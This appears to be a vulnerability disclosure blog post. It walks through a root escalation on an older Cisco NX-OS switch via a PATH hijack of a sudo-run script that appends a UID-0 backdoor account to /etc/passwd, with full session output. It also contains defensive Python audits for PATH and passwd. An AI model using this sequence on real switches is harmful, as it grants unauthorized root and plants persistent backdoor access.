Hacking NX-OS Part 1

Some of you may know me as a sage hacker from the mid 80's to the early 90's. Although, if you met me after 1994, most of you probably don't know that about me at all. It was a previous life. Sufficient time has passed since I informed Cisco about numerous security vulnerabilities in older versions of NX-OS that I can now make this post. I have no idea if these are even still relevant in newer versions. I hack stuff, and I move on. I was quite involved in NX-OS years ago, as it was based on SanOS, an OS I became intimately familiar with while getting my CCIE Storage. Nowadays I focus on advanced software engineering and doing anything on a beach! You may wish to read my articles:

Deconstructing Cisco NX-OS Part 1: Exploding Kickstart
Deconstructing Cisco NX-OS Part 2: Exploding the System Image

A walkthrough of hacking NX-OS:

We log in as normal.

login: admin
Password:
Last login: Fri Mar 25 07:25:34 UTC 2011 on ttyS0
Last login: Fri Mar 25 07:41:04 on ttyS0
Cisco NX-OS Software
Copyright (c) 2002-2010, Cisco Systems, Inc. All rights reserved.
switch#

We can run bash and look at our environment, specifically our PWD and PATH:

switch# bash set
% Warning, couldn't set default directory, Using '/' instead
BASH=/bin/sh
BASH_ARGC=()
BASH_ARGV=()
BASH_EXECUTION_STRING=set
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="3" [1]="2" [2]="33" [3]="1" [4]="release" [5]="i586-wrs-linux-gnu")
BASH_VERSION='3.2.33(1)-release'
CLIC_LEVEL=0
COLUMNS=80
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)'
HOSTTYPE=i586
IFS='   '
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
POSIXLY_CORRECT=y
PPID=5305
PS4='+ '
PWD=/
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SLOT_NUM=0
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=sh

We can view /etc/passwd; it's the normal NX-OS /etc/passwd, root user locked out, etc.

switch# bash cat /etc/passwd
% Warning, couldn't set default directory, Using '/' instead
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
__eemuser:*:101:100:eemuser:/var/home/__eemuser:/isanboot/bin/nobash
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

Let's create a script; we have write access to the filesystem. The new entry reuses the hash for the "nbv123" password, which is the default for ftpuser:

switch# bash echo "#!/bin/bash" > /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
switch# bash echo "echo toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash >> /etc/passwd" >> /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
switch# bash cat /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
#!/bin/bash
echo toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash >> /etc/passwd

Make the file executable:

switch# bash chmod 755 /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
switch# bash ls -al /tmp/cat
% Warning, couldn't set default directory, Using '/' instead
-rwxr-xr-x 1 admin network-admin 76 Mar 25 07:29 /tmp/cat

Make sure we can manipulate PATH and put our CWD "." as the first entry.

A new bash is spawned for each bash command, so we have to set PATH in the same invocation as the program we execute:

switch# bash cd /tmp;PATH=.:$PATH;set
% Warning, couldn't set default directory, Using '/' instead
BASH=/bin/sh
BASH_ARGC=()
BASH_ARGV=()
BASH_EXECUTION_STRING='cd /tmp;PATH=.:$PATH;set'
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="3" [1]="2" [2]="33" [3]="1" [4]="release" [5]="i586-wrs-linux-gnu")
BASH_VERSION='3.2.33(1)-release'
CLIC_LEVEL=0
COLUMNS=80
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)'
HOSTTYPE=i586
IFS='   '
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OLDPWD=/
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=.:/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
PIPESTATUS=([0]=”0″)
POSIXLY_CORRECT=y
PPID=5305
PS4='+ '
PWD=/tmp
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=

Check our current id:

switch# bash id
% Warning, couldn't set default directory, Using '/' instead
uid=2002(admin) gid=503(network-admin) groups=503(network-admin)

I can't post this command as it would not be good, but you get the point.

switch# bash cd /tmp;PATH=.:$PATH;set;sudo /isan/bin/perf-cmd.sh
% Warning, couldn't set default directory, Using '/' instead
BASH=/bin/sh
BASH_ARGC=()
BASH_EXECUTION_STRING='cd /tmp;PATH=.:$PATH;set;sudo /isan/bin/perf-cmd.sh'
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="3" [1]="2" [2]="33" [3]="1" [4]="release" [5]="i586-wrs-linux-gnu")
BASH_VERSION='3.2.33(1)-release'
CLIC_LEVEL=0
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)'
HOSTTYPE=i586
IFS='   '
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OLDPWD=/
OPTERR=1
OSTYPE=linux-gnu
PATH=.:/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
PIPESTATUS=([0]=”0″)
POSIXLY_CORRECT=y
PPID=5305
PWD=/tmp
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SLOT_NUM=0
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=
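The whole escalation above rests on two things: the caller can prepend "." to PATH, and a script later run under sudo resolves commands by bare name in that inherited PATH. The following Python is an added example (not code from the post or from NX-OS) that audits a PATH value for entries a caller can control and, against a constructed set of planted file names, shows which file the shell's lookup rule would pick for "cat" before and after the "." is prepended. STOCK_PATH and HIJACKED_PATH are copied from the post's output; PLANTED is a hypothetical stand-in for the filesystem.

```python
"""Audit a PATH value for entries that let a caller-controlled directory shadow
system binaries, the condition the post exploits with PATH=.:$PATH.
Added example; this is not code from the original post or from NX-OS."""
import os
import stat

# Constructed from the post: the stock PATH of the NX-OS bash sandbox and the
# same PATH after "." (the current working directory) has been prepended.
STOCK_PATH = "/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin"
HIJACKED_PATH = ".:" + STOCK_PATH

# Hypothetical planted files used in place of a real filesystem so the lookup
# order can be shown offline; "./cat" stands for the /tmp/cat script.
PLANTED = {"./cat", "/bin/cat"}


def audit_path(path_value, check_fs=False):
    """Return (entry, reason) findings for a PATH string.

    Flags an empty entry (POSIX shells treat it as the current directory),
    an explicit ".", any other relative entry, and optionally directories on
    the real filesystem that are world-writable without the sticky bit.
    """
    findings = []
    for entry in path_value.split(":"):
        if entry == "":
            findings.append((entry, "empty entry resolves to current directory"))
        elif entry == ".":
            findings.append((entry, "explicit current directory"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry depends on caller's cwd"))
        elif check_fs and os.path.isdir(entry):
            mode = os.stat(entry).st_mode
            if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                findings.append((entry, "world-writable without sticky bit"))
    return findings


def resolve_command(name, path_value, exists=os.path.isfile):
    """Return the file a shell would execute for `name` under `path_value`.

    Mirrors the shell rule: a name containing "/" is used as-is, otherwise
    the first PATH directory holding the name wins. `exists` is injectable
    so the demonstration can run against PLANTED instead of the real disk.
    """
    if "/" in name:
        return name
    for entry in path_value.split(":"):
        candidate = os.path.join(entry or ".", name)
        if exists(candidate):
            return candidate
    return None


if __name__ == "__main__":
    for label, value in (("stock", STOCK_PATH), ("hijacked", HIJACKED_PATH)):
        picked = resolve_command("cat", value, PLANTED.__contains__)
        print(f"{label}: 'cat' -> {picked}")
        for entry, reason in audit_path(value):
            print(f"  finding: entry {entry!r}: {reason}")
```

Run it on a real host with check_fs=True to also catch world-writable PATH directories. The other half of the fix is on the sudo side: the standard sudoers settings Defaults env_reset and Defaults secure_path make sudo discard the caller's PATH, so a script it runs resolves "cat" from system directories no matter what the caller set; whether the NX-OS build in the post had either is not something the post shows. Scripts run with elevated privilege should additionally call binaries by absolute path.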

Check /etc/passwd:

switch# bash cat /etc/passwd
% Warning, couldn't set default directory, Using '/' instead
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash

SUCCESS!

switch# exit
login: toor
Password:
Last login: Fri Mar 25 07:24:46 UTC 2011 on ttyS0
Last login: Fri Mar 25 07:32:34 on ttyS0
root@(none):/root> w
07:32:37 up  1:31,  1 user,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
toor     ttyS0    -                07:32    0.00s  0.00s  0.00s w
root@(none):/root> ls -al
total 12
drwxr-x---  2 root root 100 Mar 25 07:25 .
drwxr-xr-x 35 root root 780 Mar 25 06:01 ..
-rw-------  1 root root  15 Mar 25 07:25 .bash_history
-rw-r--r--  1 root root  15 Jan 13  2009 .bash_logout
-rw-r--r--  1 root root 191 Jan 13  2009 .profile
root@(none):/root> id
uid=0(root) gid=0(root) groups=0(root)
root@(none):/root> w
07:33:28 up  1:32,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
toor     ttyS0    -                07:32    0.00s  0.00s  0.00s w
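The two /etc/passwd listings in the post are what a defender has to work with after the fact: the backdoor shows up as a second UID-0 account with an interactive shell, a password hash copied verbatim from ftpuser, and (comparing the two listings) an account, __eemuser, that is no longer present. The Python below is an added example, not code from the post or from NX-OS, that parses passwd(5) text and reports exactly those conditions, with the first listing as a baseline. Both listings are copied from the post; NON_LOGIN_SHELLS is an assumed list (nobash is the NX-OS shell seen on the page, the others are the usual Linux placeholders). Note that the stock adminbackup account is also UID 0 and gets flagged on its own merits; the baseline comparison is what separates what the image shipped with from what was added.

```python
"""Audit /etc/passwd content for the artefacts the post leaves behind: an extra
UID-0 account, a password hash copied from another account, and accounts that
appear or disappear relative to a known-good baseline.
Added example; this is not code from the original post or from NX-OS."""
from collections import defaultdict

# Both listings are copied from the post: the stock file and the file after
# the "toor" line was appended (note that __eemuser is absent in the second).
STOCK_PASSWD = """\
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
__eemuser:*:101:100:eemuser:/var/home/__eemuser:/isanboot/bin/nobash
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
"""
MODIFIED_PASSWD = """\
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash
"""

# Assumed: shells that do not give an interactive login. nobash is the NX-OS
# one seen in the post; the rest are the usual Linux placeholders.
NON_LOGIN_SHELLS = {"/isanboot/bin/nobash", "/sbin/nologin", "/bin/false"}
# "x" means the hash lives in /etc/shadow; the others mean the account is locked.
LOCKED = {"x", "*", "!", ""}


def parse_passwd(text):
    """Parse passwd(5) text into dicts; a malformed line raises ValueError."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries


def audit_passwd(entries, baseline=None):
    """Return (subject, reason) findings; with a baseline, also report
    accounts added or removed since it."""
    findings = []
    by_hash = defaultdict(list)
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "UID 0 account other than root"))
        if e["pw"] not in LOCKED:
            by_hash[e["pw"]].append(e["name"])
            if e["shell"] not in NON_LOGIN_SHELLS:
                findings.append((e["name"], "hash in passwd with a login shell"))
    for names in by_hash.values():
        if len(names) > 1:
            findings.append((",".join(names), "password hash shared between accounts"))
    if baseline is not None:
        before = {e["name"] for e in baseline}
        after = {e["name"] for e in entries}
        findings += [(n, "account added since baseline") for n in sorted(after - before)]
        findings += [(n, "account removed since baseline") for n in sorted(before - after)]
    return findings


if __name__ == "__main__":
    base = parse_passwd(STOCK_PASSWD)
    for subject, reason in audit_passwd(parse_passwd(MODIFIED_PASSWD), baseline=base):
        print(f"{subject}: {reason}")
```

The baseline should come from a trusted copy of the image's passwd file rather than from the running box, since a box where this has already happened has nothing trustworthy left to compare against.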
